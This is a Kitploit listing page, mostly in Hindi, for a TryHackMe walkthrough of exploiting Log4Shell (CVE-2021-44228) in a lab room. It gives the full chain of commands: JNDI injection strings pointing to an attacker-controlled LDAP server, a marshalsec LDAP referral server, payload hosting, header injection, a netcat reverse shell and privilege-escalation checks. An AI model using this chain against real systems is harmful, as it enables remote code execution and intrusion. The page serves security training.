Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Solar-exploiting-log-4j — चरण-दर-चरण TryHackMe वॉकथ्रू, Log4Shell भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करने और फ़्लैग कैप्चर करने के लिए। | Kitploit
उपकरण/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

चरण-दर-चरण TryHackMe वॉकथ्रू, Log4Shell भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करने और फ़्लैग कैप्चर करने के लिए।

रिपॉजिटरी देखें
2115 महीने पहलेअभी तक समीक्षित नहीं

🔥 Solar Exploiting Log4j - TryHackMe वॉकथ्रू

📌 रूम: Solar Exploiting Log4j

प्लेटफ़ॉर्म: TryHackMe कठिनाई: मध्यम विषय: Log4Shell (Log4j भेद्यता)


🧠 उद्देश्य

Log4j भेद्यता (CVE-2021-44228) का फायदा उठाकर रिमोट कोड एक्सीक्यूशन प्राप्त करें और फ़्लैग कैप्चर करें।


🛠️ उपयोग किए गए उपकरण

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 चरण 1: टोही

🔍 लक्ष्य स्कैन करें

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 निष्कर्ष

  • खुले पोर्ट: 80 (HTTP), अन्य रूम पर निर्भर करते हैं
  • वेब एप्लिकेशन Java-आधारित बैकएंड पर चल रहा है

🌐 चरण 2: वेब एन्यूमरेशन

  • वेब ऐप को ब्राउज़र में खोलें
  • इनपुट्स (लॉगिन/सर्च/हेडर फ़ील्ड) के साथ इंटरैक्ट करें
  • Burp Suite का उपयोग करके रिक्वेस्ट कैप्चर करें

💥 चरण 3: Log4j भेद्यता की पहचान करें

Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।


⚙️ चरण 4: लिसनर सेट करें

Netcat प्रारंभ करें

root@kitploit:~
nc -lvnp 4444

मैलिशियस LDAP सर्वर प्रारंभ करें (उदाहरण)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAP सर्वर चलाएँ:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 चरण 5: पेलोड होस्ट करें

root@kitploit:~
python3 -m http.server 8000

मैलिशियस Java क्लास (Exploit.class) बनाएँ


🚀 चरण 6: एक्सप्लॉइट ट्रिगर करें

पेलोड को भेद्य फ़ील्ड में इंजेक्ट करें:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 इन हेडर्स का उपयोग करें:

  • User-Agent
  • X-Api-Version

🖥️ चरण 7: रिवर्स शेल प्राप्त करें

ट्रिगर होने के बाद:

  • टारगेट Netcat लिसनर से वापस कनेक्ट करता है
  • आपको शेल एक्सेस मिलता है

🔐 चरण 8: प्रिविलेज एस्केलेशन (यदि आवश्यक हो)

जाँचें:

root@kitploit:~
sudo -l

इनकी तलाश करें:

  • गलत कॉन्फ़िगर की गई SUID बाइनरी
  • लिखने योग्य फ़ाइलें
  • क्रॉन जॉब्स

🚩 चरण 9: फ़्लैग कैप्चर करें

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 मुख्य अवधारणाएँ सीखीं

  • Log4Shell (CVE-2021-44228)
  • JNDI इंजेक्शन
  • रिमोट कोड एक्सीक्यूशन (RCE)
  • रिवर्स शेल
  • वेब एक्सप्लॉइटेशन
टूल डाउनलोड करें